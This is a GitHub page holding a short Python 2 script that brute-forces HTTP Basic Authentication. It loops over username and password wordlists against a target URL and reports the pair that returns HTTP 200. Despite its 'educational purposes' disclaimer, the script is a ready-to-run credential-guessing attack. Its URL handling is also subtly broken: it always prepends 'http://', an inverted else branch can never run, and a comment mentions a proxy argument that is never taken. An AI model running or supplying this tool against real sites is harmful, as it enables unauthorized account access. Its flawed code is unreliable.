-
Notifications
You must be signed in to change notification settings - Fork 4
/
Copy pathbruteforcer.py
49 lines (39 loc) · 1.33 KB
/
bruteforcer.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
#/bin/python
#Bruteforece HTTP auth coded by Yannvl.
#Use only for educational purposes.
#Need to install python requests: pip install requests/easy_install requests
import requests
#import os
import sys
from sys import argv
#arguments; script name, username list, password list, proxy adress form of http://IP:port, website
script, userlist, passlist, site = argv
#os.environ['HTTP_PROXY'] = proxy
#make list, enter string site in list. place 0.
web = []
web.append(site)
#check if there is http:// in front of site, otherwise add it to the string site
if web[0:7] != "http://":
web[0] = "http://" + str(site)
else:
print "No good URL with http !!!"
print "Password Brute-Forcing target: " + web[0] + "\n\n"
#Check if url is up
url = requests.get(web[0])
if url.status_code == 401:
with open(userlist) as usernames:
users = usernames.read().splitlines()
with open(passlist) as passwords:
passes = passwords.read().splitlines()
for user in users:
for password in passes:
print "Trying %s : %s" %(user, password)
login = user, password
req = requests.get(url=web[0], auth=(login))
if req.status_code == 200:
print "Success on: Username = %s and Password = %s <--!" % (user, password)
else:
print "Failure to login. Wrong username and password."
else:
print "Website not online or not a valid HTTP basic AUTH!"
sys.exit()